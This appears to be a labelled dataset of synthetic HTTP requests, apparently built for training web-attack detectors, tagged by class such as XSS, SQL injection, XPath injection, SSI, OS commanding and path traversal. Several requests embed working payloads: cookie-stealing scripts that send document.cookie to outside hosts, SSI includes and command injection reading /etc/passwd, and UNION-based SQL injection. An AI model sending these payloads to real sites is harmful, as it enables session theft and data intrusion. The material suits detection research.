Authorization: Digest nc=e472deD1
Range: 7-228,-05193
Referer: http://www.ssootet9.fr/lrfayaq/r4eooatl/nes30A.pl
TE: trailers,deflate;q=0.6
Trailer: Expect
User-Agent: Mozilla/3.8 (compatible; MSIE 1.8; Windows NT; bawsir)
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 573x190
Via: HTTP/8.7 www.lins5.gif, 9.7 www.yle0anc.png:2
Transfer-Encoding: identity
Upgrade: m0oet/4.8
Warning: 243 www.sr5ots.htm "h5poe8s" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 729426151535484
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39294
Start - Id: 48186
class: XSS
POST /Ioi8ts8m/o.934BMqb/ka/oc/eitmrcsIrer/YrOCyT65grmpw/setet6ins/iVWIPB9v.cfm? HTTP/1.0
Content-Length: 33
Content-Language: rTo23te
Content-Encoding: gzip
Content-Location: http://eeeH6tq.cz/tthcE8/pOtnea/saae1ei.asmx
Content-MD5: dXNoZWI5RWh1dGVsdGVyZg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Mar 07 06:37:10 UTC
Last-Modified: Sun, 19 Nov 06 24:42:52 GMT
Host: www.iudlb0spd.net
Connection: 3heor
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: <div onmouseover    ="  [alert('bde');]  "   >
Accept-Language: *
Cache-Control: min-fresh=7123
Client-ip: 196.219.140.167
Cookie: tsty=h46ri;uebRi7lhdss=91572569;ydt15fl1uesc=424;ngday9stbene=7;AdN7WlJZechoQF=374
Cookie2: $Version="60"
Date: Fri, 18 Sep 09 13:04:05 UTC
ETag: "13Q28YBJBklXk8y"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Tue, 18 Dec 07 02:28:56 UTC
If-Unmodified-Since: Tue, 20 Jan 09 17:01:09 GMT
If-Match: *
If-None-Match: "vcZ8ta0u0lgd05my"
If-Range: Thu, 15 Sep 05 16:37:27 CET
Max-Forwards: 00
MIME-Version: 3.5
Pragma: nebigd=lly
Proxy-Authorization: NTLM ZTlzaXNlaXhJaDBlQnZhbGVobXBlbHJkZnJwVXR0dDhobmFkeWFpbHRpZA==
Authorization: NTLM Y2FlNWF0cDJodGlvcjB3bW9pOW1zbGlBU2s4dGF0OGhvZWFydw==
Range: -1170
Referer: http://www.ren5irbw.uk/gleu/eLfutRm.swf
TE: gzip,deflate;q=0.4,deflate;q=0.3
Trailer: Range
User-Agent: totx5ed
UA-CPU: Sparc
UA-Disp: 6418,097,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 615x877
Via: 4.7 www.cNnwie.jpeg
Transfer-Encoding: identity
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 142.177.244.22
X-Serial-Number: 2322173255
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uusipg=ubegWwHoK1&seiar8Bnn=uheao

End - Id: 48186
Start - Id: 47251
class: XSS
GET /thSf3/n@@i/iframea_.php3?taI9e=84&v9K@Eib=6&epLsnueUymboS=hr%25ivart3s&ll4ktIoiToqrsii=02&ryeshtFnE5tioe=%3Cdiv++style%3D%22++behaviour%3A+++url%28%5Bhttp%3A%2F%2Fwww.atalasit.com%2Fscript%2Frmt.sh%5D%29%3B+++%22%3E&htIadEmhgasn=148199610&fl=64276&tirur=362114006 HTTP/1.0
Host: www.azigwr4ahe.gov
Connection: uhagra
Accept: image/png;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: sj-y6;q=0.9, drwea-mr;q=0.6
Cache-Control: no-cache
Client-ip: 19.118.218.108
Cookie: mtuT2wrtterto=ie
Cookie2: $Version="66"
Date: Tue, 06 Apr 10 10:27:41 CET
ETag: "Kr5xQV4a.H1DhBu"
Expect: 100-continue
From: mP8eatM@krgt.fr
If-Modified-Since: Tue, 11 May 04 04:26:21 UTC
If-Unmodified-Since: Tue, 26 Jan 10 12:40:54 CET
If-Match: "xyYZ28-yPIyeKjhST4-"
If-None-Match: *
If-Range: "p3.BQaZCl7N6PhYI"
Max-Forwards: 57
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: 6ndit medexEq=belmLsj
Authorization: Digest nonce
Range: -88
Referer: /dCtc.php
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.1 (compatible; Konqueror/4.4; Solaris; et7YsEdlN; lkthob; eir5r)
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 077x3740
Via: 8.8 124.244.194.141
Transfer-Encoding: compress
Upgrade: ebpgud/5.5, uo6ys/3.0, eeei/3.0, wOU/7.9
Warning: 231 178.152.9.49 "iem9a" "Sat, 05 Jul 08 14:59:50 GMT"
X-Forwarded-For: 29.33.63.135
X-Serial-Number: 15152704800
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47251
Start - Id: 44336
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: 56.95.154.151:80
Connection: close
Accept: application/zip;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: rnridja='elaletdx'
Client-ip: 189.90.122.222
Cookie: eosleoth=Anm8zy~
Cookie2: $Version="29"
Date: Fri, 11 Jul 08 03:18:19 GMT
ETag: "pOapT_4.CIXI5gO"
Expect: tnstr3=Ht7tPac;rhjSmod
From: ssaaei@srTei5is.de
If-Modified-Since: Tue, 17 Jan 06 01:32:43 GMT
If-Unmodified-Since: Thu, 15 Feb 07 09:07:32 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Apr 10 08:26:09 GMT
Max-Forwards: 6
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: /ae0yI5.pl
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.8 (compatible; Konqueror/0.6; Mac OS X; hni6)
UA-CPU: x86
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: 3mg/9.0 228.95.189.55
Transfer-Encoding: fhta9; eMna=dk93lPs
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44336
Start - Id: 49157
class: XPathInjection
GET /qUYusKdNHB/i8sdCiL-A0tieETp2_D/rMQTKs-/nidY8g2xGu/g59Y/t2sXrfsr9aeaEsel/g5rxExPTeQWmBeKNgD/i4nhf9KT7_S/llBaHYiERm-gF813_7dl.tiff?nEdropU=vessIteikfsexdt&77zdJbLMN6K=1443&s7rinhmtrlr7=tnfiotjoeer8e&d2vj=45102041&ssqaqcl=lenly%7Cnn+niPoii&WoriqYBPDeii=x%25aene%28%7Cq%25titi%2Fsn&Pa=dw0oAle%27+or+++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28++++i++%2B+++j%2B+++k++%2B++l++%2B+1%29%5D+%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++%27aaz07yp%27%3D+%27++wy%27+++++or&st3r2bf61tdee=lsytcfi HTTP/1.1
Host: www.cNgCtia.de:3
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-greek
Accept-Encoding: deflate;q=0.9
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 38.175.250.11
Cookie: nledc=96;hle=io96RU95j
Cookie2: $Version="052"
Date: Wed, 09 Mar 05 07:17:54 GMT
ETag: "JRiumqeHdoOse.-"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Wed, 23 Mar 05 22:12:40 UTC
If-Unmodified-Since: Sun, 12 Dec 04 22:21:01 UTC
If-Match: "0RYhKtFgl@DG.dlBDTr"
If-None-Match: "uLyRHl6Vyb3jBji5ZbXM"
If-Range: Thu, 05 Apr 07 18:36:57 CET
Max-Forwards: 3123
MIME-Version: 5.8
Pragma: eimnie='toeg'
Proxy-Authorization: Digest opaque="Mpzdea"
Authorization: woeb tyitxgi=npaonat
Range: -441207,31726-,-3
Referer: /recu1N/t0db/tdteWune.cfm
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.1 (Machintosh; U; Mac OS X 9.4; rt-t1; rv:1.5.8) Gecko/86509874
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7758x5013
Via: FTP/1.7 186.32.1.62
Transfer-Encoding: deflate
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49157
Start - Id: 39382
class: SSI
GET /s51y6hmHK/rssouu/ag/dPbOrbrF88.l/Yhgb.png?1xEFAU=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&OnubspnntTte=vUU&rRuEaogdn58Ts7=bfdJEM0w&e4uCrttaheis2eh=574879&bta0a=8famgilRkwmDapSi&6hcXkv=aTtH&d5mifmwIect=hcintdRr8he&psymke0exdeA9sr=h-8ocn&iidsttad4=86441254&mbbooe1viEsclA=1 HTTP/1.1
Host: 210.23.199.25
Connection: close
Accept: video/*;q=0.3, video/*;q=0.0, video/quicktime
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: gs-sNVs06o, isoahi-hD7v;q=0.2
Cache-Control: rl1tncfe='tratr'
Client-ip: 199.73.230.133
Cookie: 5en=33;f2@FA19SPGU=< @;kieierlyecANsrd=09077215;smttentFesel=netrasy0jrsu;nodvGcjefKA_=ahatoil5mmform
Cookie2: $Version="734"
Date: Tue, 23 Aug 05 20:03:53 CET
ETag: "T9OD6afFbV_WKfZ"
Expect: 100-continue
From: lece@srdgy.org
If-Modified-Since: Wed, 16 Apr 08 24:53:45 GMT
If-Unmodified-Since: Wed, 11 Nov 09 04:03:42 UTC
If-Match: "eG3E@nsn1yEyHK6r8KHc"
If-None-Match: "Ywl2nk3GWx5g8osfI_U"
If-Range: Fri, 23 Apr 10 14:35:24 GMT
Max-Forwards: 60
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: uriec enihpu=eed4it
Authorization: Basic ZW90c1M6Y3BpZXI=
Range: -7403,569103-
Referer: /hesR8.cfm
TE: gzip;q=0.6,trailers
Trailer: If-Unmodified-Since
User-Agent: lo8lLB_Hkx http://www.l6aA.fr
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 757x2155
Via: HTTP/4.2 100.28.171.184, FTP/9.2 www.ruhntn5e.jpg, HTTP/1.6 6.19.55.50
Transfer-Encoding: compress
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 436 www.siscd.jpeg "oiebdEomsriX" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39382
Start - Id: 47681
class: XSS
GET /kyk-/eejo/arh3I8V.0jnZRkVROpT/mosshlano/tsbt/nooalrnlI3ist2NsRza/H1UOezkxp_/e3sNtuhnpr.htm?ui5npc=a%3Dum7&voidhecgcs=i+&xhaa1=3&stpl5Asogpn=%5B%5CxC0%5D%5B%5CxBC%5Dscript+%3E%5Bwindow.open%28%27http%3A%2F%2F61.104.120.211%2Fnstoen.dll%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript%3E&allscript-wp-NuZZa7r=trlzn+&ai8rlntwx0=13 HTTP/1.1
Host: www.aewmasnsep.org
Connection: keep-alive
Accept: application/*, audio/*
Accept-Charset: windows-1252;q=0.2, iso-8859-7;q=0.5, iso-10646-ucs-2, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 99.240.245.14
Cookie: pjaswT2=196740605
Cookie2: $Version="699"
Date: Wed, 21 May 08 20:12:21 UTC
ETag: W/"1J-g4mVQQ066LcLj0iD8"
Expect: 100-continue
From: 25osyn@hmnsy.org
If-Modified-Since: Sun, 16 Apr 06 24:27:24 CET
If-Unmodified-Since: Thu, 19 Mar 09 20:54:37 UTC
If-Match: "oCobgbA9qPn0lbZJ7"
If-None-Match: "pLvXZnxw1FRZ8P24f4Bj"
If-Range: Mon, 23 Apr 07 04:49:35 CET
Max-Forwards: 0
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic eWF0aTpuNkV0YUVr
Authorization: Basic ZHNub2hvOmVtaHY=
Range: 70-,2-,3-3356
Referer: http://www.jmtr.fr/a7oi7Gd/ovifwts.php3
TE: trailers
Trailer: From
User-Agent: 5Q2R63 http://www.uzvs.org
UA-CPU: 68000
UA-Disp: 9242,0652,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 934x7117
Via: 0.4 0.114.127.182:98626
Transfer-Encoding: identity
Upgrade: gnEas/1.7, t6e4/9.4, 6sseci/3.1, daIRa/3.5, livoLt/6.1
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47681
Start - Id: 47386
class: XSS
GET /oggC/e9/mR58rwpul/aihljjdarJI_Irv8DWb/dFnQIH/uLS.UvXYW_mailiBy/drzeSga/K5XivgOv1telnetIolO/h4gWT.png?h3hctseIIfrao=a1pxGT&hcovsotrYgj=Npehnotkd6vxrsOn&9abfru=guehafadyiteno&uqrFofnoei=0KeV3_o&o0rapigvvqaap=scripth&liols2dk8t7n=%26%3Cscript+++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.elreer.com%2Fcgi-bin%2Fna.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&C78SLH8g=yan HTTP/1.0
Host: www.i5hzowsjao.fr
Connection: asrhd8d
Accept: */*;q=0.6
Accept-Charset: x-mac-roman;q=0.6, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 28.115.64.238
Cookie: Eer4=iU7include ;lsY8Owjist=7u4all6]ldkonh;iYtd=uniigohnyF;Ucimsoen53ha=fs7uw
Cookie2: $Version="936"
Date: Mon, 07 Nov 05 16:32:02 GMT
ETag: "qU9Zz3Bq9qX7dva"
Expect: 100-continue
From: dhMEe9le@RpqtlrdwLb.be
If-Modified-Since: Wed, 17 Aug 05 20:49:32 GMT
If-Unmodified-Since: Fri, 27 Jan 06 05:44:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7856
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: Basic aXBucmM6ZXNhY3U=
Range: 35419-,75138-2674,165640-
Referer: /aSbt.jpg
TE: trailers,deflate;q=0.9
Trailer: Accept-Charset
User-Agent: gugeEnCaeTn
UA-CPU: MIPS
UA-Disp: 8070,4376,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1670x058
Via: 0.0 240.221.188.123, HTTP/0.4 www.eYEtzha.jpg:8, 4.3 www.ivo4he.css
Transfer-Encoding: Dihyda
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 6529673477463
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47386
Start - Id: 39176
class: SSI
PUT /lA4bSrG0DOSO/lVvmtDGz5.shtml? HTTP/1.1
Content-Length: 83
Content-Language: r,ttcA5
Content-Encoding: deflate
Content-Location: /rbeh/vdrk5/dfqo/Ace9iic/possu.mpeg
Content-MD5: bUljYWhuMXZzb2VqbGVlMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Nov 08 12:51:52 UTC
Last-Modified: Thu, 20 May 04 23:21:11 UTC
Host: 239.224.6.55:0
Connection: tprgo
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.3, deflate, deflate
Accept-Language: *
Cache-Control: n=uoOTtl
Client-ip: 105.29.124.80
Cookie: mtet=se6a;wnWe4fG2zn4e=elr
Cookie2: $Version="261"
Date: Fri, 09 May 08 19:21:56 CET
ETag: W/"531dopOQUGTzEYYmsZ"
Expect: s2C5
If-Modified-Since: Fri, 04 May 07 22:08:20 CET
If-Unmodified-Since: Sun, 28 Feb 10 01:04:55 CET
If-Match: "sOzRumYnkfBqp-gFi5U_"
If-None-Match: *
If-Range: Tue, 07 Oct 08 16:35:25 CET
Max-Forwards: 5
MIME-Version: 3.6
Pragma: 34arsk=eeta
Authorization: NTLM aWxuMXV1YWFkZFRpYnJlZWVscnNnc3FzZ3FnbGIxb09o
Referer: http://hy7t.uk/rou0bed.jpeg
TE: trailers,gzip;q=0.0,trailers
Trailer: Pragma
User-Agent: aMFjChZE http://www.i1nmhb.uk
UA-Pixels: 466x9263
Via: FTP/6.2 www.eouus9nb.png, Eagc/6.2 71.228.144.120:29, FTP/8.0 102.112.204.211
Transfer-Encoding: deflate
Upgrade: pnoi/6.7, ita3m/3.5
~~~~~: ~~~~~~~~~~

eOxglirqvNrOhs=n2=fr&uima=92&Jl74.cmeta=<!--#echo var="date_gmt"-->

End - Id: 39176
Start - Id: 46268
class: PathTransversal
GET /ncrrt/1JoErBJllAVePt/rp6k5-@R/OX/oTFj@/ihLJhtpassG/df/nP.rPIGCedNtNas52U/onssrtlrifbokztuta/mZq@@XitwtTBI/UVQmetaM19bNUEV/ooibAg_.css?hh7j=naf1brOnr&ire=%2Fetc%2Fpasswd&simd=xtermKncwtoeyne%25c&H0qdTddcA6ti=o15NqiD_NGK&zsy6saqnqoxyohk=%3Eldropgdeleten&phpB@uDGaN=02137935&nkr=isqMwpY_C&Iemidttodls=en%3Eiefh&oi=cvdaPb HTTP/1.1
Host: www.Ymdtthp5y.uk
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: a='h4Dnaei4'
Client-ip: 117.131.231.99
Cookie: asonIewUE=no19Kuhinm0suomu;9riokm=85355828;sh=haleltqrkadUIx
Cookie2: $Version="45"
Date: Thu, 03 Feb 05 06:24:04 GMT
ETag: W/"zjbRV5pdy3nxjAnt"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sat, 18 Jul 09 09:43:05 CET
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: "OC.S91f7VOZZ5ai6"
If-None-Match: "KfGa4I33X5fXQmtG"
If-Range: *
Max-Forwards: 1
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: Digest uri=http://jnnte.ch/cre5lhut/onigo/0t2iftsi/AfeeT.mpeg
Range: 5-,79312-76,-8628
Referer: /dohp/3oha/Issym/E1sJlm.zip
TE: gzip;q=0.8,chunked,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 1.5; 1i-ry; rv:5.7.9) Gecko/84233457
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: HTTP/0.2 www.sRNsgg.html, ujfcs/2.6 www.sqyen.shtml, 7.3 www.8edleuoe.css:4
Transfer-Encoding: gzip
Upgrade: Su9qj/8.6, baec/7.2
Warning: 687 www.ndt99mt.png:13587 "extsrsgust" "Thu, 14 Feb 08 08:06:55 UTC"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46268
Start - Id: 43639
class: OsCommanding
PUT /dXqCtR7/4o9eaealbrdrunh/qoeyamoEitr/rsL.dll? HTTP/1.0
Content-Length: 231
Content-Language: ryftzsh,P6on,i
Content-Encoding: gzip
Content-Location: /re9tt/qHazrqct/cmdkn/sotsO.jpeg
Content-MD5: dGVyaWkyanJlbmFldGVjYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 May 08 07:28:05 GMT
Last-Modified: Mon, 13 Nov 06 20:03:40 UTC
Host: www.onn7hea.it
Connection: lpel
Accept: application/rtf
Accept-Charset: x-mac-cyrillic, x-mac-hebrew, windows-874;q=0.7, iso-8859-8-i, ks_c_5601-1987
Accept-Encoding: identity, identity;q=0.4
Accept-Language: *
Cache-Control: emeeer='Jlo'
Client-ip: 75.243.26.94
Cookie: esen2iTEsfie=Ltnph-s>ee[hyseeor;gctiotn=aid;sdeuse=%0a cat  %0a /etc/passwd%0a;orergo=ee
Cookie2: $Version="84"
Date: Mon, 28 Jan 08 13:19:09 GMT
ETag: W/"yxDNODRJMIqnXD4"
Expect: hiinRree=sbisfn;fede=0e79rs
From: hseet@mdxc.uk
If-Modified-Since: Thu, 09 Nov 06 20:04:33 GMT
If-Unmodified-Since: Mon, 27 Aug 07 18:11:30 CET
If-Match: "bijDFtk-lL8oJZLy_"
If-Range: *
Max-Forwards: 7
MIME-Version: 8.4
Pragma: 7amttiT=ilIe6
Authorization: rgheh orugjn=4dt7ai
Range: 8440-713053,328-2049,920753-4
Referer: /4orehhm/rtei.asp
TE: trailers,deflate;q=0.2,gzip
Trailer: Authorization
User-Agent: sndDIw5q http://www.cwom.cz
UA-Pixels: 843x2301
Via: 5.4 242.253.108.34:40042
Transfer-Encoding: identity
X-Forwarded-For: 2.247.41.183
X-Serial-Number: 15223176
----: --------------------
~~~~~: ~~~~~~~~~~~~~

hogtUrj=latFWvt9oes&hkDlKdFl=ttcu6K6WBjj&teesiser=u1?a&oYnbel8tates=8094590486&tcleecrzEnnxe=nB_szAJqor&ectdto38ofhzelx=ujQvUJ2&ls=includeihe'kwlocationH&k6atdrr=0246&thUWf=re1dc8evaloa&85i7h=51935190&rwo= ZoCO8 56orR(Eau?n

End - Id: 43639
Start - Id: 40922
class: SSI
GET /GRaboot.inixtpno/cyL-mcXK/voii6ltnicra4geia/u8/passthruknVJTxEPVmh@/bqf3etaa3paeu/_mochaY0VWomailB/bn.htm?watqc7l2ghr=patieaEata&wdsnven=agefe&h1smioSAWng=tUUi_&mochaWEoP=ahomehttpistylet7S%7E&dBI=9Udgwh9h451&psesisoxc5tbyLd=az&VHbqDXcjhaving=r%3E&etc=g.0LLVt&ns1e=aeytmp%5CO+r+%7C+%26%7Cah&rsaot=%3ENttf&bAeswebshrmr2=%3C%21--+%23odbc+++statement++%3D++%22select+++n2zDcf%2C++sOslRcur%2C+++++PE+++from++++hoLn++++order+++by+++++5%2C+92%2C+++++4%22++++--%3E&e4usogst=69292597&pweilea=y9N&hatuh8adusrk=stbcslT HTTP/1.0
Host: www.eM0sre.de
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-1, windows-1254, koi8-r, iso-8859-15;q=0.4, cp-932;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 164.186.250.7
Cookie: uooErt=27248306;oegmzhhewmr=sa)qe
Cookie2: $Version="5"
Date: Sun, 14 Nov 04 02:55:11 UTC
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: nBhmshg
From: tmenra3@rdaoespvt.it
If-Modified-Since: Wed, 30 Sep 09 23:19:52 UTC
If-Unmodified-Since: Sun, 27 Dec 09 16:12:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 7.5
Pragma: oiWU9='C7lk'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM aWZiaDZzRWVmbzBldHg0YmNla3d0dGUybmVpb3locDRpZndvcg==
Range: 56699-901828,6-1585
Referer: /9haes/7ioewea/TaNo/tiireoOe/nib1Tp.jpg
TE: chunked;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 6.1; Up-la; rv:3.2.1) Gecko/78295694
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Linux
UA-Color: color16
Via: 3.4 www.o3aeo7p.css
Transfer-Encoding: identity
Upgrade: nTt/9.5, zose/2.4, Rar7eI/3.2, sextda/4.5
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40922
Start - Id: 42143
class: SqlInjection
GET /geg/ger.dll?c6jahet8t1xga9=n.wZ&Aopp=oo%3AohomeSa%5Dem8ntlaiadminl&VXb64RX=%27++%29++UNION+++ALL+++++SELECT+++memsdx+%2C+Eimyfeur+++++%2C+dvht+FROM++ceo0m+++++WHERE++++lre+++NOT++IN++++%28+%27vpni4%27+++%29++AND+++o70tsesxFT+++NOT+++++IN+++%28++%27mu%27+++%29+AND++++%27%27++++%3D++++%27&np1Do9dMgeae=r7%5Dodzorh&Saotiteanpn=gSLz7AAY.&hnveqyay=536703&tkiiOcmhOyaiinu=lcjfeiqaoo&gu=6__WT&q68mdNvOi=tIexecrTrv&re3hKtoeeOsndlr=441&tl=048 HTTP/1.0
Host: www.a9cUea.biz
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-6, windows-1250, euc-tw;q=0.1, windows-1250;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: 6dsiiben-a;q=0.7, nphe-est
Cache-Control: max-stale
Client-ip: 117.221.83.105
Cookie: G8.cSn=50;KTWJU0=m
Cookie2: $Version="5"
Date: Thu, 01 Apr 10 19:25:18 CET
ETag: "Y-kpqEtfEwcQg2fs"
Expect: 2tic
From: yaieolw@dAieet.st
If-Modified-Since: Tue, 25 Jul 06 08:09:22 UTC
If-Unmodified-Since: Sat, 14 Jun 08 19:57:10 CET
If-Match: "6gckW0jd7dbfoPfk2X"
If-None-Match: *
If-Range: *
Max-Forwards: 3700
MIME-Version: 0.7
Pragma: 2ac='PNt'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Digest realm
Range: 80-3804,023297-91,09-
Referer: http://www.ta7T.net/ire8Re.js
TE: deflate,trailers
Trailer: Authorization
User-Agent: t3an5xnfe3yc
UA-CPU: StrongARM
UA-Disp: 2259,521,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 929x052
Via: 5.9 www.rantT.css
Transfer-Encoding: compress
Upgrade: 9lrrsw/6.5, henvno/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 45705
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42143
Start - Id: 39735
class: SSI
GET /ygcdrANvjujl50mjv.html?esut7flfIeeye=oaon&shur=9dp&yceasuawep=he&1N=ysmPL2&prxe63euthft=oj0F&YSNxsEhi2Y=eLW1J&ouoe54edoA74=122041893&3rplnrene=binsrh&ro=TIa7esi&tophhebr3eE=%3C%21--+++%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E HTTP/1.0
Host: 220.165.211.141
Connection: keep-alive
Accept: image/jpeg, text/*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="1"
Date: Mon, 14 Apr 08 10:29:03 GMT
ETag: "RpokNe@hiUrDxRmesWrO"
Expect: 100-continue
From: edtEiwvr@nastnEtx.it
If-Modified-Since: Thu, 09 Feb 06 12:23:12 UTC
If-Unmodified-Since: Fri, 23 May 08 16:48:19 CET
If-Match: "VB-CR1dEDdJkDQNi"
If-None-Match: *
If-Range: "W6mTMCkvr6JinUU1"
Max-Forwards: 5
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: 5O8lgd dEae=hb6eE
Authorization: Basic dGRpc2lpOm50YkJpdDU=
Range: -58,-7,-12255
Referer: /stena.htm
TE: trailers,chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 9.2; hn-as; rv:8.9.8) Gecko/93142858
UA-CPU: Sparc
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 602x675
Via: 8.2 www.rc6iiqkc.jpeg:82987
Transfer-Encoding: gzip
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
